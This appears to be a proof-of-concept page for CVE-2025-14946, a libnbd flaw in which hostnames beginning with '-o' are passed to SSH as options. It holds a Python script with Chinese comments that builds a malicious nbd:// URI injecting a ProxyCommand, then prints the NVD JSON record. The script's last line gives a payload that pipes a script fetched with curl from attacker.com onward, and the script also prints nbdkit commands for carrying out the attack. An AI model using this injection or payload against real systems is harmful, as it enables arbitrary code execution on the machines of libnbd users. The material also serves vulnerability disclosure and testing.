CVE-2025-14946

# CVE-2025-14946 PoC - libnbd URI处理命令注入 # 构造恶意URI触发SSH选项注入 import subprocess import sys # 恶意URI示例 - 主机名以'-o'开头注入SSH选项 malicious_uri = "nbd://-oProxyCommand=id>/tmp/pwned localhost" print(f"[*] CVE-2025-14946 PoC") print(f"[*] Malicious URI: {malicious_uri}") print(f"[*] This URI exploits the SSH option injection in libnbd") print() # 模拟libnbd的URI解析和SSH命令构建过程 # 实际攻击时需要使用libnbd的nbd_get_error()或类似API def simulate_libnbd_uri_parsing(uri): """ Simulate how libnbd parses URI and builds SSH command. The vulnerability is that hostnames starting with '-o' are passed directly to SSH as options instead of being treated as hostname. """ print(f"[+] Parsing URI: {uri}") # Simplified parsing - in reality uses libxml2 if uri.startswith("nbd://"): host_part = uri[6:].split('/')[0] print(f"[+] Extracted host: {host_part}") # VULNERABLE: No validation of host starting with '-' if host_part.startswith('-o'): print(f"[!] WARNING: Host starts with '-o' - will be interpreted as SSH option!") # Simulating SSH command construction ssh_cmd = ['ssh', host_part, 'nbd-server-read-only'] print(f"[+] Constructed SSH command: {' '.join(ssh_cmd)}") print(f"[!] The '-oProxyCommand=...' will be treated as SSH option!") return ssh_cmd return None # 执行PoC ssh_cmd = simulate_libnbd_uri_parsing(malicious_uri) if ssh_cmd: print() print("[*] To exploit, attacker would run:") print(f"[*] nbdkit -r nbd {malicious_uri}") print("[*] Or use libnbd API to connect to this malicious URI") print() print("[+] Example: nbd://-oProxyCommand=curl${IFS}attacker.com/shell.sh|[email protected]/")

{"cve": {"id": "CVE-2025-14946", "sourceIdentifier": "[email protected]", "published": "2025-12-19T13:16:03.127", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14946", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423789", "source": "[email protected]"}, {"url": "https://libguestfs.org/libnbd-release-notes-1.24.1.html#Security", "source": "[email protected]"}]}}